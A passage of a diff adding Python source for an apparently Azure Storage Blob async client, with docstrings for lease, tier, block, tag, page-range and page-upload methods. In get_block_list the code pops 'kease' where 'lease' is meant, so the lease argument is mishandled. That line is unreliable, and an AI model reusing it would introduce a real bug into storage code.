HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def acquire_lease(self, lease_duration=-1, lease_id=None, **kwargs): + # type: (int, Optional[str], Any) -> BlobLeaseClient + """Requests a new lease. + + If the blob does not have an active lease, the Blob + Service creates a lease on the blob and returns a new lease. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :param str lease_id: + Proposed lease ID, in a GUID string format. The Blob Service + returns 400 (Invalid request) if the proposed lease ID is not + in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A BlobLeaseClient object. + :rtype: ~azure.storage.blob.aio.BlobLeaseClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common_async.py + :start-after: [START acquire_lease_on_blob] + :end-before: [END acquire_lease_on_blob] + :language: python + :dedent: 12 + :caption: Acquiring a lease on a blob. + """ + lease = BlobLeaseClient(self, lease_id=lease_id) # type: ignore + await lease.acquire(lease_duration=lease_duration, **kwargs) + return lease + + @distributed_trace_async + async def set_standard_blob_tier(self, standard_blob_tier, **kwargs): + # type: (Union[str, StandardBlobTier], Any) -> None + """This operation sets the tier on a block blob. + + A block blob's tier determines Hot/Cool/Archive storage type. + This operation does not update the blob's ETag. + + :param standard_blob_tier: + Indicates the tier to be set on the blob. Options include 'Hot', 'Cool', + 'Archive'. The hot tier is optimized for storing data that is accessed + frequently. The cool storage tier is optimized for storing data that + is infrequently accessed and stored for at least a month. The archive + tier is optimized for storing data that is rarely accessed and stored + for at least six months with flexible latency requirements. + :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if standard_blob_tier is None: + raise ValueError("A StandardBlobTier must be specified") + try: + await self._client.blob.set_tier( + tier=standard_blob_tier, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + lease_access_conditions=access_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def stage_block( + self, block_id, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> None + """Creates a new block to be committed as part of a blob. + + :param str block_id: A string value that identifies the block. + The string should be less than or equal to 64 bytes in size. + For a given blob, the block_id must be the same size for each block. + :param data: The blob data. + :param int length: Size of the block. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword str encoding: + Defaults to UTF-8. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + options = self._stage_block_options( + block_id, + data, + length=length, + **kwargs) + try: + return await self._client.block_blob.stage_block(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def stage_block_from_url( + self, block_id, # type: Union[str, int] + source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + source_content_md5=None, # type: Optional[Union[bytes, bytearray]] + **kwargs + ): + # type: (...) -> None + """Creates a new block to be committed as part of a blob where + the contents are read from a URL. + + :param str block_id: A string value that identifies the block. + The string should be less than or equal to 64 bytes in size. + For a given blob, the block_id must be the same size for each block. + :param str source_url: The URL. + :param int source_offset: + Start of byte range to use for the block. + Must be set if source length is provided. + :param int source_length: The size of the block in bytes. + :param bytearray source_content_md5: + Specify the md5 calculated for the range of + bytes that must be read from the copy source. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + :rtype: None + """ + options = self._stage_block_from_url_options( + block_id, + source_url=self._encode_source_url(source_url), + source_offset=source_offset, + source_length=source_length, + source_content_md5=source_content_md5, + **kwargs) + try: + return await self._client.block_blob.stage_block_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_block_list(self, block_list_type="committed", **kwargs): + # type: (Optional[str], Any) -> Tuple[List[BlobBlock], List[BlobBlock]] + """The Get Block List operation retrieves the list of blocks that have + been uploaded as part of a block blob. + + :param str block_list_type: + Specifies whether to return the list of committed + blocks, the list of uncommitted blocks, or both lists together. + Possible values include: 'committed', 'uncommitted', 'all' + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A tuple of two lists - committed and uncommitted blocks + :rtype: tuple(list(~azure.storage.blob.BlobBlock), list(~azure.storage.blob.BlobBlock)) + """ + access_conditions = get_access_conditions(kwargs.pop('kease', None)) + mod_conditions = get_modify_conditions(kwargs) + try: + blocks = await self._client.block_blob.get_block_list( + list_type=block_list_type, + snapshot=self.snapshot, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return self._get_block_list_result(blocks) + + @distributed_trace_async + async def commit_block_list( # type: ignore + self, block_list, # type: List[BlobBlock] + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """The Commit Block List operation writes a blob by specifying the list of + block IDs that make up the blob. + + :param list block_list: + List of Blockblobs. + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict[str, str] + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool validate_content: + If true, calculates an MD5 hash of the page content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._commit_block_list_options( + block_list, + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return await self._client.block_blob.commit_block_list(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_premium_page_blob_tier(self, premium_page_blob_tier, **kwargs): + # type: (Union[str, PremiumPageBlobTier], **Any) -> None + """Sets the page blob tiers on the blob. This API is only supported for page blobs on premium accounts. + + :param premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :rtype: None + """ + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if premium_page_blob_tier is None: + raise ValueError("A PremiumPageBlobTiermust be specified") + try: + await self._client.blob.set_tier( + tier=premium_page_blob_tier, + timeout=kwargs.pop('timeout', None), + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_blob_tags(self, tags=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + """The Set Tags operation enables users to set tags on a blob or specific blob version, but not snapshot. + Each call to this operation replaces all existing tags attached to the blob. To remove all + tags from the blob, call this operation with no tags set. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :param tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + :type tags: dict(str, str) + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + :keyword bool validate_content: + If true, calculates an MD5 hash of the tags content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: Dict[str, Any] + """ + options = self._set_blob_tags_options(tags=tags, **kwargs) + try: + return await self._client.blob.set_tags(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_blob_tags(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """The Get Tags operation enables users to get tags on a blob or specific blob version, but not snapshot. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to add tags to. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Key value pairs of blob tags. + :rtype: Dict[str, str] + """ + options = self._get_blob_tags_options(**kwargs) + try: + _, tags = await self._client.blob.get_tags(**options) + return parse_tags(tags) # pylint: disable=protected-access + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_page_ranges( # type: ignore + self, offset=None, # type: Optional[int] + length=None, # type: Optional[int] + previous_snapshot_diff=None, # type: Optional[Union[str, Dict[str, Any]]] + **kwargs + ): + # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + """DEPRECATED: Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. + + :param int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param str previous_snapshot_diff: + The snapshot diff parameter that contains an opaque DateTime value that + specifies a previous blob snapshot to be compared + against a more recent snapshot or the current blob. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: + A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys. + The first element are filled page ranges, the 2nd element is cleared page ranges. + :rtype: tuple(list(dict(str, str), list(dict(str, str)) + """ + warnings.warn( + "get_page_ranges is deprecated, use list_page_ranges instead", + DeprecationWarning + ) + + options = self._get_page_ranges_options( + offset=offset, + length=length, + previous_snapshot_diff=previous_snapshot_diff, + **kwargs) + try: + if previous_snapshot_diff: + ranges = await self._client.page_blob.get_page_ranges_diff(**options) + else: + ranges = await self._client.page_blob.get_page_ranges(**options) + except HttpResponseError as error: + process_storage_error(error) + return get_page_ranges_result(ranges) + + @distributed_trace + def list_page_ranges( + self, + *, + offset: Optional[int] = None, + length: Optional[int] = None, + previous_snapshot: Optional[Union[str, Dict[str, Any]]] = None, + **kwargs: Any + ) -> AsyncItemPaged[PageRange]: + """Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. If `previous_snapshot` is specified, the result will be + a diff of changes between the target blob and the previous snapshot. + + :keyword int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword previous_snapshot: + A snapshot value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by `previous_snapshot` + is the older of the two. + :paramtype previous_snapshot: str or Dict[str, Any] + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int results_per_page: + The maximum number of page ranges to retrieve per API call. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) of PageRange. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.PageRange] + """ + results_per_page = kwargs.pop('results_per_page', None) + options = self._get_page_ranges_options( + offset=offset, + length=length, + previous_snapshot_diff=previous_snapshot, + **kwargs) + + if previous_snapshot: + command = partial( + self._client.page_blob.get_page_ranges_diff, + **options) + else: + command = partial( + self._client.page_blob.get_page_ranges, + **options) + return AsyncItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=PageRangePaged) + + @distributed_trace_async + async def get_page_range_diff_for_managed_disk( + self, previous_snapshot_url, # type: str + offset=None, # type: Optional[int] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + """Returns the list of valid page ranges for a managed disk or snapshot. + + .. note:: + This operation is only available for managed disk accounts. + + .. versionadded:: 12.2.0 + This operation was introduced in API version '2019-07-07'. + + :param previous_snapshot_url: + Specifies the URL of a previous snapshot of the managed disk. + The response will only contain pages that were changed between the target blob and + its previous snapshot. + :param int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: + A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys. + The first element are filled page ranges, the 2nd element is cleared page ranges. + :rtype: tuple(list(dict(str, str), list(dict(str, str)) + """ + options = self._get_page_ranges_options( + offset=offset, + length=length, + prev_snapshot_url=previous_snapshot_url, + **kwargs) + try: + ranges = await self._client.page_blob.get_page_ranges_diff(**options) + except HttpResponseError as error: + process_storage_error(error) + return get_page_ranges_result(ranges) + + @distributed_trace_async + async def set_sequence_number( # type: ignore + self, sequence_number_action, # type: Union[str, SequenceNumberAction] + sequence_number=None, # type: Optional[str] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """Sets the blob sequence number. + + :param str sequence_number_action: + This property indicates how the service should modify the blob's sequence + number. See :class:`~azure.storage.blob.SequenceNumberAction` for more information. + :param str sequence_number: + This property sets the blob's sequence number. The sequence number is a + user-controlled property that you can use to track requests and manage + concurrency issues. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._set_sequence_number_options( + sequence_number_action, sequence_number=sequence_number, **kwargs) + try: + return await self._client.page_blob.update_sequence_number(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def resize_blob(self, size, **kwargs): + # type: (int, Any) -> Dict[str, Union[str, datetime]] + """Resizes a page blob to the specified size. + + If the specified value is less than the current size of the blob, + then all pages above the specified value are cleared. + + :param int size: + Size used to resize blob. Maximum size for a page blob is up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._resize_blob_options(size, **kwargs) + try: + return await self._client.page_blob.resize(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_page( # type: ignore + self, page, # type: bytes + offset, # type: int + length, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """The Upload Pages operation writes a range of pages to a page blob. + + :param bytes page: + Content of the page. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword bool validate_content: + If true, calculates an MD5 hash of the page content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._upload_page_options( + page=page, + offset=offset, + 